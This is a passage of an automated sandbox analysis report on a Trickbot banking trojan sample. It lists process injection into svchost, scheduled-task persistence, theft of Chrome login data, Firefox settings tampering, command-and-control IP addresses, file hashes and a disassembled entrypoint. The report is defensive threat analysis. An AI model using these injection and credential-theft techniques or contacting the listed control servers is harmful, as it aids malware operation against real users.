Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A01CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A020Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A024Jump to behavior
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Users\user\Desktop\ucD6u0vstJ.exeProcess created: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeJump to behavior
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
Contains functionality to create a new security descriptorShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003C80A0 AllocateAndInitializeSid,AllocateAndInitializeSid,memset,SetEntriesInAclW,SetSecurityInfo,SetSecurityInfo,GetCurrentProcess,SetSecurityInfo,SetSecurityInfo,SetSecurityInfo,SetSecurityInfo,GetLastError,FreeSid,FreeSid,LocalFree,CloseHandle,2_2_003C80A0

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003C7131 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_003C7131
Contains functionality to query the account / user nameShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003C1440 GetUserNameW,memset,2_2_003C1440
Contains functionality to query windows versionShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003CEB30 GetVersion,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,2_2_003CEB30
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\taskeng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Overwrites Mozilla Firefox settingsShow sources
Source: C:\Windows\System32\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.jsJump to behavior
Source: C:\Windows\System32\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.jsJump to behavior
Source: C:\Windows\System32\svchost.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.jsJump to behavior

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.jsJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.jsJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bakJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 575186 Sample: ucD6u0vstJ.exe Startdate: 05/06/2018 Architecture: WINDOWS Score: 100 42 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->42 44 Detected Trickbot e-Banking trojan inject config 2->44 46 Detected Trickbot e-Banking trojan config 2->46 48 3 other signatures 2->48 7 taskeng.exe 1 2->7         started        9 ucD6u0vstJ.exe 3 2->9         started        process3 file4 13 ucE7u0vttK.exe 10 7->13         started        30 C:\Users\user\AppData\...\ucE7u0vttK.exe, PE32 9->30 dropped 32 C:\Users\...\ucE7u0vttK.exe:Zone.Identifier, ASCII 9->32 dropped 56 Delayed program exit found 9->56 18 ucE7u0vttK.exe 2 9->18         started        signatures5 process6 dnsIp7 36 185.42.192.194, 449, 49190, 49193 TIME-NETIQ Iraq 13->36 38 94.250.254.22, 447, 49192 ISPSYSTEM-ASISPsystemAutonomousSystemLU Netherlands 13->38 40 3 other IPs or domains 13->40 34 C:\Users\user\AppData\...\systeminfo32, data 13->34 dropped 58 Detected Trickbot Trojan 13->58 60 Installs new ROOT certificates 13->60 62 Writes to foreign memory regions 13->62 68 2 other signatures 13->68 20 svchost.exe 1 11 13->20         started        24 svchost.exe 13->24         started        64 Found evasive API chain (may stop execution after checking mutex) 18->64 file8 66 Detected TCP or UDP traffic on non-standard ports 38->66 signatures9 process10 file11 26 C:\Users\user\AppData\Roaming\...\prefs.js, ASCII 20->26 dropped 28 C:\Users\user\AppData\...\Login Data.bak, SQLite 20->28 dropped 50 Overwrites Mozilla Firefox settings 20->50 52 Tries to harvest and steal browser information (history, passwords, etc) 20->52 54 Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines) 24->54 signatures12

Simulations

Behavior and APIs

TimeTypeDescription
11:05:28API Interceptor1x Sleep call for process: ucD6u0vstJ.exe modified
11:05:43Task SchedulerRun new task: MsSysToken path: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
11:05:43API Interceptor4x Sleep call for process: ucE7u0vttK.exe modified
11:06:03API Interceptor4x Sleep call for process: taskeng.exe modified
11:07:02API Interceptor83x Sleep call for process: svchost.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshots

windows-stand

Startup

  • System is w7_1
  • ucD6u0vstJ.exe (PID: 3480 cmdline: 'C:\Users\user\Desktop\ucD6u0vstJ.exe' MD5: DE1CE3514F777178D672EE79AC398A74)
    • ucE7u0vttK.exe (PID: 3492 cmdline: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe MD5: DE1CE3514F777178D672EE79AC398A74)
  • taskeng.exe (PID: 3536 cmdline: taskeng.exe {2B3EACB2-7281-44E8-9006-229A29FB4963} S-1-5-18:NT AUTHORITY\System:Service: MD5: 4F2659160AFCCA990305816946F69407)
    • ucE7u0vttK.exe (PID: 3568 cmdline: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe MD5: DE1CE3514F777178D672EE79AC398A74)
      • svchost.exe (PID: 3728 cmdline: svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
      • svchost.exe (PID: 3916 cmdline: svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
  • cleanup

Created / dropped Files

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History.bak
Process:C:\Windows\System32\svchost.exe
File Type:SQLite 3.x database
Size (bytes):94208
Entropy (8bit):0.4994935498288338
Encrypted:false
MD5:AE387499C77AE5E429D7BF8175421FB1
SHA1:F02567C0BFDC2B9D29C666FE690464AB329D460E
SHA-256:9B6B172C1162D1B0C2640D763F9642E3125094BD4864917C8B99693A2B8B19B3
SHA-512:5DB630B31F11A10EF36B81B123A102833DF0AF89248D9110DFC13366A0DE0915F43B5765A2869CE50B6E28223967F52E20ED19766E43842200A7668E632C1B76
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak
Process:C:\Windows\System32\svchost.exe
File Type:SQLite 3.x database
Size (bytes):18432
Entropy (8bit):0.852140055112637
Encrypted:false
MD5:A8621F29FD303FB5ED20DAAD3FD3A8CB
SHA1:F536DE7809F38BC0FCD33A9FCA7A8CF4ECE6DDAC
SHA-256:3A646CB91D47FD9345EED024714DE3AA07AFD2FA1F558D408A1A45A6D76CB572
SHA-512:BA663CD2FAF7AC63536772BC2E6674779C285B297D8B70F783C80BCA658F405A306F5E3C3DDB9225928C1636F5CDB5D3585F7885D509F7B52CCFD75508F32C3F
Malicious:true
Reputation:low
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js
Process:C:\Windows\System32\svchost.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):160
Entropy (8bit):4.435439401639462
Encrypted:false
MD5:2FCDBA665D4FF7FFC6C99CCDB7568D11
SHA1:2AEAAFBB94BB218536B7FDD1F042BDD1D225AF75
SHA-256:F45D0AE1321B66DA296006DC119A5EEF80B796C8E523F51A1A62A0F7FF4B22B6
SHA-512:A83F98863E26C7BA4EA28108621D799E535B66E8E499C557AFFF05EE0B8F354416C80662C40AEE8B8A5925C94AAD7AC1ADCB112B7419A599B457B71E1467750B
Malicious:true
Reputation:low
C:\Users\user\AppData\Roaming\freenet\FAQ
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:data
Size (bytes):96
Entropy (8bit):2.933434330649638
Encrypted:false
MD5:8BB138CF0BD64AEC67410CAFDAFE11EE
SHA1:DE16894822BDD3A0F0A022BE3670EF24157B853C
SHA-256:D2E926923CA8A6B1930841AD9E398DD3F64ACA47E2A32771326953C97A910C6C
SHA-512:6F4E9F627DD25E7DC65C779752742EB0736FEFCC156E1B291984ACE1F75A9FA07E209AEB4C814AE77C2F8AFA24957CB96B15D826171EDF078E5E6550B4FCCB1C
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\freenet\Modules\injectDll32
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:data
Size (bytes):754640
Entropy (8bit):7.999762607389893
Encrypted:true
MD5:E641A3AC1612AA80FAC5DE6C27ABAF46
SHA1:E1727531476288B902198FD88B0FAD0DD0A075A1
SHA-256:6AE2884548A4A9AEA6B755E4F3D9249D8516B1B92240ECCE4DC266BFBCBDFD3B
SHA-512:9A30A9AC5E02EEBA148943FB7EA842250691B6EE1FBBE8B4C4B2DD567F91B1CF802C32BFF24C04DD265C46D7C4783CBE061EE3EE0279C24C23FAF4521ADDE239
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\freenet\Modules\injectDll32_configs\dinj
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:data
Size (bytes):51344
Entropy (8bit):7.996502571345262
Encrypted:true
MD5:A4DCDCD1E52439DEB0F9F90C6F03187C
SHA1:1F9DA771CEB462DAB2554ECAA3ED3B36D9AB1C84
SHA-256:5540D7C9D32870FD6E86F8E224751E39EA4F9AB62DFB074023F4E49E4C670190
SHA-512:1D8F731BD0691DBB8B61A24F055B9E0B15CDC30DF3278ED9667F2E475F7271B65EBFC413FF10E8A52AEBE1D0DAC030941824ED11311B4B9137B03DD68EB223B3
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\freenet\Modules\injectDll32_configs\dpost
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:data
Size (bytes):432
Entropy (8bit):7.5509106377198245
Encrypted:false
MD5:8A181B24533AE20F79CF3EEC69F5E825
SHA1:10C93A045015E86713385609E8B837F6CBD18973
SHA-256:AA20066550E0F5AA737CBF811EFA315AEF63525B35C87F54CE1A708D4B09CA13
SHA-512:A5A59AB3EC9CFD15A4332F3233CCDC928BBA1DFD94508EA9259FBD304B736AF7FA67B8A7450435A56D7DB440C672CF65FE2D14900042186DD215155167B29EE8
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\freenet\Modules\injectDll32_configs\sinj
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:data
Size (bytes):38304
Entropy (8bit):7.995009190804732
Encrypted:true
MD5:2B8140202BA9A927CE8D6087E54A17B4
SHA1:E63003740A5CF1009ECA497E1F437E2B4FEAD776
SHA-256:8CA53E9DA08EB1F233BA7D115D3683C808815DDDAFBD1207399AE6525A3A216E
SHA-512:B8E24196E295E5594666E28B38759B7572A2C9B1EB96FD33937DBF9084F9B8D12CABC46992AE98649B26E05E34817A329E93C97C4B4B48B65386240F544F138F
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\freenet\Modules\systeminfo32
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:data
Size (bytes):87216
Entropy (8bit):7.99816202635642
Encrypted:true
MD5:B3A9D059584418A2A0803FB0C6753EA9
SHA1:D19EF63CCEF78C785CBDE5008FBFE7721625D02F
SHA-256:70DCCAA8296D3101E33F952EB2A927A21F428786F1F8DB724EAF918408E348CF
SHA-512:51C13E5D6C91341A158A40D746E929433B78F39BE48B3705D3E0B172CDCFDE677B008F58FC938C06AE93D8157008D28ED3C662811A720DC42E203FAB34A9D2DC
Malicious:true
Reputation:low
C:\Users\user\AppData\Roaming\freenet\README.md
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:data
Size (bytes):14
Entropy (8bit):2.09306920777189
Encrypted:false
MD5:1675B57D7147ACDB9532C46A7F483237
SHA1:AC59890339D2C9B99E2A50EC5DCF52603C1096C2
SHA-256:0564493BCBA2C6F7A80D5E86BB4202B61CAB5B0CB7E9E8E57F72FC98DEB1CFB5
SHA-512:C49E69662FC5B211104A2FE57EEA3375520F9E92D2DF77C43B477EAE7FBF229775151642A604F99A69B413757B011223A738E1CE66BFDD05FD92BFF5C3E5D05B
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\freenet\info.dat
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:PCX ver. 2.8 image data, without palette
Size (bytes):1272
Entropy (8bit):7.8393510891099645
Encrypted:false
MD5:8CD554954C5486C34AC28E58D2B0AFAC
SHA1:53F3E131EB4AECA1608B24AF62A7E84B84B6614C
SHA-256:2FDE9C9EADFF705F6B7C2E69315EDA634C69458EE64C994C7A0788CF3957D699
SHA-512:F09619949C5059160BCA61D7D53824BDE2F4CBACCCD402CDA6EB1EDD24B35E1C22B3A3419567471174496F6E6C4FB08D87630D414A8BB932225B3E86F60FF10C
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
Process:C:\Users\user\Desktop\ucD6u0vstJ.exe
File Type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):233984
Entropy (8bit):7.943766395072443
Encrypted:false
MD5:DE1CE3514F777178D672EE79AC398A74
SHA1:3DEDD7A2A55D337ABB4FAB69005794B1F4F8E775
SHA-256:C6BAA54DB42806216932280FCCA4F07E8323792D38199A966931EE713D387893
SHA-512:5B14F51EF96946741895EF047E1CF4506C8A0DA81EFACD90AD609BD40C2CBA82AE089B75FF754538C7239934D1961E82AD72CF10647BE660C25FD86A3A246A74
Malicious:true
Reputation:low
C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe:Zone.Identifier
Process:C:\Users\user\Desktop\ucD6u0vstJ.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):26
Entropy (8bit):3.9500637564362093
Encrypted:false
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Reputation:low
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:Microsoft Cabinet archive data, 53830 bytes, 1 file
Size (bytes):161490
Entropy (8bit):7.9957473858448225
Encrypted:true
MD5:ADF8E835A8F04B4E6DC6BA0E24DADE1E
SHA1:51DDFE409EBA9C1FD54748A64879059AFBEE458A
SHA-256:A6E248E3CDAA2C2ED82E1EBAD211DEC4EC90F420E6EDE58EF12AF42F85CBE1F0
SHA-512:AA3023D5ECD76E7102A8064B6F8AE094EABEBA9E1107F97936158AFB0DCBEEE01C19A7825AD862EFCE353BDDF707FBF6BB6F56C700247A5B4A3529F6683DD231
Malicious:false
Reputation:low
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:data
Size (bytes):984
Entropy (8bit):3.144769887788158
Encrypted:false
MD5:E16272EE9EE40388F4EA7D3295250E06
SHA1:A29C0B13CF44AA689AF07264453696212DC3DCBE
SHA-256:2ADD821C5E5B50BE0816E093EBC1719C7F032C2891653DA54EBB48D88F1259FF
SHA-512:1FBB1F3AEF16AABCC00EA47C1917F9E9D049F03CFBD8FD595119A0225866D3FC237F090C18D47A500D7501E03FA98A484A168D84DB2A224C2B3A8667A4D15727
Malicious:false
Reputation:low
\samr
Process:C:\Windows\System32\svchost.exe
File Type:GLS_BINARY_LSB_FIRST
Size (bytes):516
Entropy (8bit):4.022389674026674
Encrypted:false
MD5:2909D5802A91906E8F58475ECF7ABEBC
SHA1:419AFEAA8AA9E210DD81A093B6E154E84D144FCB
SHA-256:8055BC80FAED2F16FA793ABAE4A3225B0DFE9F43E37DC39AFCC7C65269613A67
SHA-512:0219239D75C581CBE267358D92D28689DCD26DF3A1F7F8D1238F48B127815430B8F1E797237C6F4BF23EA14A3EAAF9781EE0866323AE4034C151E9DE296E5EC1
Malicious:false
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
checkip.amazonaws.com54.84.34.26truefalsehigh

Contacted URLs

NameProcess
http://checkip.amazonaws.com/C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPCountryFlagASNASN NameMalicious
54.84.34.26United States
14618AMAZON-AES-AmazoncomIncUSfalse
94.250.254.22Netherlands
29182ISPSYSTEM-ASISPsystemAutonomousSystemLUtrue
185.42.192.194Iraq
62223TIME-NETIQtrue
78.155.199.51Russian Federation
197068QRATORRUtrue

Private

IP
192.168.1.13

Static File Info

General

File type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit):7.943766395072443
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:ucD6u0vstJ.exe
File size:233984
MD5:de1ce3514f777178d672ee79ac398a74
SHA1:3dedd7a2a55d337abb4fab69005794b1f4f8e775
SHA256:c6baa54db42806216932280fcca4f07e8323792d38199a966931ee713d387893
SHA512:5b14f51ef96946741895ef047e1cf4506c8a0da81efacd90ad609bd40c2cba82ae089b75ff754538c7239934d1961e82ad72cf10647be660c25fd86a3a246a74
File Content Preview:MZ......................@...................................h...........!..L.!This is a PE executable..$PE..L...z..[..........................................@................................................................................................

File Icon

Static PE Info

General

Entrypoint:0x401000
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:
Time Stamp:0x5B14E57A [Mon Jun 4 07:08:42 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:

Entrypoint Preview

Instruction
push 00007530h
pop ecx
inc eax
loop 5DE96E8Fh
call 5DE96EF9h
int 00h
dec esp
add bh, al
add byte ptr [ecx+6E00C004h], bh
add bh, byte ptr [ecx]
add byte ptr [eax], ah
add byte ptr [eax-0FFFE700h], cl
jmp far ecx
add byte ptr [ecx+73003D00h], ch
add byte ptr [ebp+5F001900h], ah
add byte ptr [ecx+00h], bl
sbb dword ptr [eax], eax
aaa
add byte ptr [edx], bh
add cl, dh
inc dword ptr [eax+00h]
aaa
add byte ptr [edi], ah
add dword ptr [ecx], ebx
add byte ptr [edi+01h], dl
add byte ptr [edi], bl
cmp al, byte ptr [edx]
pop ss
add byte ptr [edx+06h], bh
aas
pop es
push ecx
add byte ptr [ebp-48FFBE00h], al
add dword ptr [edi], ebx
add byte ptr [ecx+4E025A00h], dl
add byte ptr [ecx+67004001h], bl
add byte ptr [edi+00h], cl
add byte ptr [eax], 00000040h
add byte ptr [ecx], ah
add al, al
add dword ptr [eax], eax
add byte ptr [edi+33h], bl
shr byte ptr [eax+1Eh], 00000003h
add byte ptr [eax], al
pop ecx
push eax
loop 5DE96E8Fh
mov eax, edi
push edi
mov ebp, esp
add eax, 000384A2h
mov dword ptr [ebp+04h], eax
push 0000FFF0h
pop ecx
mov esi, edi
mov edx, edi
cld
mov eax, ecx
lodsw
test eax, eax
je 5DE96EAEh
cmp eax, ecx
jc 5DE96EA5h
sub eax, ecx
push ecx
mov ecx, edi
add ecx, 00038606h
shl eax, 02h
add ecx, eax
mov eax, dword ptr [ecx]
pop ecx
add edx, eax
push edx
jmp 5DE96E6Eh
mov dword ptr [ebp+0Ch], eax
mov eax, ebp

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_RESOURCE0x3a0000x1d8.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x00x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x38cc10x38e00False0.988255494505ump; data7.94542714575IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc0x3a0000x1d80x200False0.546875ump; data4.87264470546IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountry
RT_MANIFEST0x3a0580x17dump; XML document textEnglishUnited States

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

Snort IDS Alerts

TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
06/05/18-11:06:32.694099TCP2021013ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex CnC)4474919294.250.254.22192.168.1.16

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Jun 5, 2018 11:06:25.378803968 MESZ5697553192.168.1.168.8.8.8
Jun 5, 2018 11:06:25.543195009 MESZ53569758.8.8.8192.168.1.16
Jun 5, 2018 11:06:25.561767101 MESZ5120853192.168.1.168.8.8.8
Jun 5, 2018 11:06:25.798557043 MESZ53512088.8.8.8192.168.1.16
Jun 5, 2018 11:06:25.800960064 MESZ4918980192.168.1.1654.84.34.26
Jun 5, 2018 11:06:25.801023006 MESZ804918954.84.34.26192.168.1.16
Jun 5, 2018 11:06:25.801493883 MESZ4918980192.168.1.1654.84.34.26
Jun 5, 2018 11:06:25.802413940 MESZ4918980192.168.1.1654.84.34.26
Jun 5, 2018 11:06:25.802448988 MESZ804918954.84.34.26192.168.1.16
Jun 5, 2018 11:06:26.081968069 MESZ804918954.84.34.26192.168.1.16
Jun 5, 2018 11:06:26.277726889 MESZ4918980192.168.1.1654.84.34.26
Jun 5, 2018 11:06:27.693026066 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:06:27.693068981 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:06:27.693124056 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:06:27.721210957 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:06:27.721254110 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:06:28.169646025 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:06:28.219899893 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:06:28.219937086 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:06:28.539153099 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:06:28.746566057 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:06:29.514065981 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:06:29.514139891 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:06:29.601973057 MESZ6222853192.168.1.168.8.8.8
Jun 5, 2018 11:06:29.822881937 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:06:30.027623892 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:06:30.218615055 MESZ53622288.8.8.8192.168.1.16
Jun 5, 2018 11:06:30.227106094 MESZ5865953192.168.1.168.8.8.8
Jun 5, 2018 11:06:30.462589979 MESZ53586598.8.8.8192.168.1.16
Jun 5, 2018 11:06:30.943119049 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:06:30.943160057 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:06:31.265777111 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:06:31.543612957 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:06:32.510466099 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:32.510546923 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:32.511104107 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:32.512552023 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:32.512576103 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:32.694098949 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:32.726932049 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:32.726972103 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:32.849668980 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.051002979 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.051146030 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.228665113 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.228715897 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.723870039 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.723921061 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.723931074 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.723959923 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.723973036 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.724134922 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.724164963 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.726540089 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.726567984 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.726723909 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:06:33.726749897 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:06:33.734679937 MESZ4474919294.250.254.22192.168.1.16
